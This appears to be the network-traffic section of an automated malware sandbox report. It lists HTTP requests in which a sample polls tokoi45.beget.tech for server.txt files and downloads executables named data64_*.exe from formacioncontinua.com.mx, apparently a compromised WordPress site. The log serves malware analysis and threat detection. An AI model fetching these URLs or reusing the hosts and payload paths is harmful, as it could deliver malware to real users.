Network Analysis

GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0 Host: yandex.ru Connection: Keep-Alive

HTTP/1.1 302 Moved temporarily Accept-CH: Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA, Sec-CH-UA-Full-Version-List, Sec-CH-UA-WoW64, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Platform, Sec-CH-UA-Full-Version, Viewport-Width, DPR, Device-Memory, RTT, Downlink, ECT Cache-Control: max-age=1209600,private Date: Thu, 29 Jun 2023 08:04:07 GMT Location: https://dzen.ru/?yredirect=true NEL: {"report_to": "network-errors", "max_age": 100, "success_fraction": 0.001, "failure_fraction": 0.1} P3P: policyref="/w3c/p3p.xml", CP="NON DSP ADM DEV PSD IVDo OUR IND STP PHY PRE NAV UNI" Portal: Home Report-To: { "group": "network-errors", "max_age": 100, "endpoints": [{"url": "https://dr.yandex.net/nel", "priority": 1}, {"url": "https://dr2.yandex.net/nel", "priority": 2}]} Transfer-Encoding: chunked X-Content-Type-Options: nosniff X-Robots-Tag: unavailable_after: 12 Sep 2022 00:00:00 PST X-Yandex-Req-Id: 1688025847374334-13398777157766195603-balancer-l7leveler-kubr-yp-sas-44-BAL-4185 set-cookie: is_gdpr=0; Path=/; Domain=.yandex.ru; Expires=Sat, 28 Jun 2025 08:04:07 GMT set-cookie: is_gdpr_b=CPzMERDzvwEoAg==; Path=/; Domain=.yandex.ru; Expires=Sat, 28 Jun 2025 08:04:07 GMT set-cookie: _yasc=bn7Fqa8wM9j/S4i19HIEoHYa91kk9uSjyRTaRDobVz5NdrjX8VoPCaf0RpGJ9A==; domain=.yandex.ru; path=/; expires=Sun, 26 Jun 2033 08:04:07 GMT; secure set-cookie: i=wlVlX96HHaKBSC4+Co1/Q7kYFSjO5kcPOfltSy/b1hYgp9xPDWMg8+ilKjydKMmKkk0ejVOlLdOMb+vcH1Z3LxJytw4=; Expires=Sat, 28-Jun-2025 08:04:07 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnly set-cookie: yandexuid=3661956031688025847; Expires=Sat, 28-Jun-2025 08:04:07 GMT; Domain=.yandex.ru; Path=/; Secure

GET /?yredirect=true HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0 Host: dzen.ru Connection: Keep-Alive

HTTP/1.1 302 Found Content-Length: 0 Content-Type: application/json;charset=utf-8 Date: Thu, 29 Jun 2023 08:04:08 GMT Location: https://sso.passport.yandex.ru/push?uuid=85d50709-205d-41dd-abfd-712b81bf467c&retpath=https%3A%2F%2Fdzen.ru%2F%3Fyredirect%3Dtrue Set-Cookie: zen_sso_checked=1; Path=/; Domain=.dzen.ru; Expires=Thu, 29-Jun-2023 20:04:08 GMT; Max-Age=43200; Secure; HttpOnly Set-Cookie: _yasc=gDfpt25vO3AdxivbQ5uANjTl0I67zPEqyWMTw/1m10SMUtpy0xxu6SVm+V4=; domain=.dzen.ru; path=/; expires=Sun, 26 Jun 2033 08:04:08 GMT; secure

GET /push?uuid=85d50709-205d-41dd-abfd-712b81bf467c&retpath=https%3A%2F%2Fdzen.ru%2F%3Fyredirect%3Dtrue HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0 Host: sso.passport.yandex.ru Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx Date: Thu, 29 Jun 2023 08:04:10 GMT Content-Type: text/html; charset=utf-8 Content-Length: 1958 Connection: close Vary: Accept-Encoding X-Download-Options: noopen X-Content-Type-Options: nosniff Surrogate-Control: no-store Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate Pragma: no-cache Expires: 0 X-DNS-Prefetch-Control: off X-XSS-Protection: 1; mode=block Content-Security-Policy: default-src 'none'; frame-ancestors https://*.dzen.ru https://dzen.ru; connect-src 'self'; script-src 'nonce-f6ef977210c4e1d88cad560c2fe76381' 'self'; img-src 'self' Set-Cookie: mda2_beacon=1688025850311; Domain=.passport.yandex.ru; Expires=Tue, 19 Jan 2038 03:14:07 GMT; Secure; Path=/ Set-Cookie: ys=c_chck.2675476113; Domain=.yandex.ru; Secure; Path=/ Set-Cookie: i=cJ5uLZk6uGvklsPZIGsPvVfEhOelZ7NrNP4VhFiad6x3dgzuTd4OHMThBv3ldFSe/kkksjMfZliuSGm04yIAFGD1/TM=; Domain=.yandex.ru; Expires=Sun, 26 Jun 2033 08:04:10 GMT; Secure; HttpOnly; Path=/ Set-Cookie: yandexuid=5998176971688025850; Domain=.yandex.ru; Expires=Sun, 26 Jun 2033 08:04:10 GMT; Secure; Path=/ Set-Cookie: mda2_domains=dzen.ru; Domain=.passport.yandex.ru; Expires=Tue, 19 Jan 2038 03:14:07 GMT; Secure; Path=/ Referrer-Policy: origin ETag: W/"7a6-fVeTrEk+gtd2z5kQ4A40FWYPjKo" Strict-Transport-Security: max-age=315360000; includeSubDomains

GET /server.txt HTTP/1.0 Host: tokoi45.beget.tech *Accept: */* *Connection: close User-Agent: Firefox-6.0

HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Thu, 29 Jun 2023 08:03:56 GMT Content-Type: text/plain Content-Length: 24 Last-Modified: Wed, 28 Jun 2023 15:14:39 GMT Connection: close ETag: "649c4e5f-18" Expires: Thu, 06 Jul 2023 08:03:56 GMT Cache-Control: max-age=604800 Accept-Ranges: bytes

GET /server1.txt HTTP/1.0 Host: tokoi45.beget.tech *Accept: */* *Connection: close User-Agent: Firefox-6.0

HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Thu, 29 Jun 2023 08:03:57 GMT Content-Type: text/plain Content-Length: 0 Last-Modified: Mon, 12 Jun 2023 05:54:23 GMT Connection: close ETag: "6486b30f-0" Expires: Thu, 06 Jul 2023 08:03:57 GMT Cache-Control: max-age=604800 Accept-Ranges: bytes

GET /server2.txt HTTP/1.0 Host: tokoi45.beget.tech *Accept: */* *Connection: close User-Agent: Firefox-6.0

HTTP/1.1 200 OK Server: nginx-reuseport/1.21.1 Date: Thu, 29 Jun 2023 08:03:57 GMT Content-Type: text/plain Content-Length: 0 Last-Modified: Mon, 29 May 2023 17:28:07 GMT Connection: close ETag: "6474e0a7-0" Expires: Thu, 06 Jul 2023 08:03:57 GMT Cache-Control: max-age=604800 Accept-Ranges: bytes

GET /2/data64_1.exe HTTP/1.0 Host: formacioncontinua.com.mx *Accept: */* *Connection: close User-Agent: Firefox-6.0

HTTP/1.0 301 Moved Permanently Connection: close content-type: text/html; charset=UTF-8 expires: Thu, 29 Jun 2023 09:03:59 GMT cache-control: max-age=3600 x-redirect-by: WordPress location: https://formacioncontinua.com.mx/2/data64_1.exe content-length: 0 date: Thu, 29 Jun 2023 08:03:59 GMT

GET /2/data64_2.exe HTTP/1.0 Host: formacioncontinua.com.mx *Accept: */* *Connection: close User-Agent: Firefox-6.0

HTTP/1.0 200 OK Connection: close content-type: application/x-msdownload last-modified: Wed, 28 Jun 2023 15:10:09 GMT accept-ranges: bytes content-length: 1539952 date: Thu, 29 Jun 2023 08:03:59 GMT

GET /2/data64_3.exe HTTP/1.0 Host: formacioncontinua.com.mx *Accept: */* *Connection: close User-Agent: Firefox-6.0

HTTP/1.0 200 OK Connection: close content-type: application/x-msdownload last-modified: Wed, 28 Jun 2023 15:10:38 GMT accept-ranges: bytes content-length: 3010560 date: Thu, 29 Jun 2023 08:04:01 GMT

GET /2/data64_4.exe HTTP/1.0 Host: formacioncontinua.com.mx *Accept: */* *Connection: close User-Agent: Firefox-6.0

HTTP/1.0 301 Moved Permanently Connection: close content-type: text/html; charset=UTF-8 expires: Thu, 29 Jun 2023 09:04:04 GMT cache-control: max-age=3600 x-redirect-by: WordPress location: https://formacioncontinua.com.mx/2/data64_4.exe content-length: 0 date: Thu, 29 Jun 2023 08:04:04 GMT

GET /2/data64_5.exe HTTP/1.0 Host: formacioncontinua.com.mx *Accept: */* *Connection: close User-Agent: Firefox-6.0

HTTP/1.0 301 Moved Permanently Connection: close content-type: text/html; charset=UTF-8 expires: Thu, 29 Jun 2023 09:04:05 GMT cache-control: max-age=3600 x-redirect-by: WordPress location: https://formacioncontinua.com.mx/2/data64_5.exe content-length: 0 date: Thu, 29 Jun 2023 08:04:05 GMT

GET /2/data64_6.exe HTTP/1.0 Host: formacioncontinua.com.mx *Accept: */* *Connection: close User-Agent: Firefox-6.0

HTTP/1.0 301 Moved Permanently Connection: close content-type: text/html; charset=UTF-8 expires: Thu, 29 Jun 2023 09:04:06 GMT cache-control: max-age=3600 x-redirect-by: WordPress location: https://formacioncontinua.com.mx/2/data64_6.exe content-length: 0 date: Thu, 29 Jun 2023 08:04:06 GMT

GET /webArg2.txt HTTP/1.0 Host: formacioncontinua.com.mx *Accept: */* *Connection: close User-Agent: Firefox-6.0

HTTP/1.0 200 OK Connection: close content-type: text/plain last-modified: Tue, 20 Jun 2023 15:40:06 GMT accept-ranges: bytes content-length: 27 date: Thu, 29 Jun 2023 08:04:06 GMT